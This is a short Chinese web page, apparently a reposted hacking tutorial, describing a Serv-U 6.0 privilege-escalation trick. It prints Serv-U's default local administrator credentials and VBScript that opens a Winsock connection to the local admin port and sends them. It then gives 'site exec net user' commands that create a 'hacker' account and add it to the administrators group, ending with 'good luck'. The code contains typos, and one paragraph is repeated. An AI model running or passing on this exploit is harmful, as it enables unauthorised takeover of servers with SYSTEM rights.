Serv-u6.0提权新招
网站建设 2021-07-03 09:40www.dzhlxh.cn网站建设
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 狼蚁网站SEO优化用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
以下是引用片段:
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)
Sock.senddata.sendata
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add” 呵呵,就这样系统权限到手了,祝大家好运!
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add” 呵呵,就这样系统权限到手了,祝大家好运!
上一篇:DNS(域名服务器)欺骗技术
下一篇:通杀动易2005的 XSS 攻击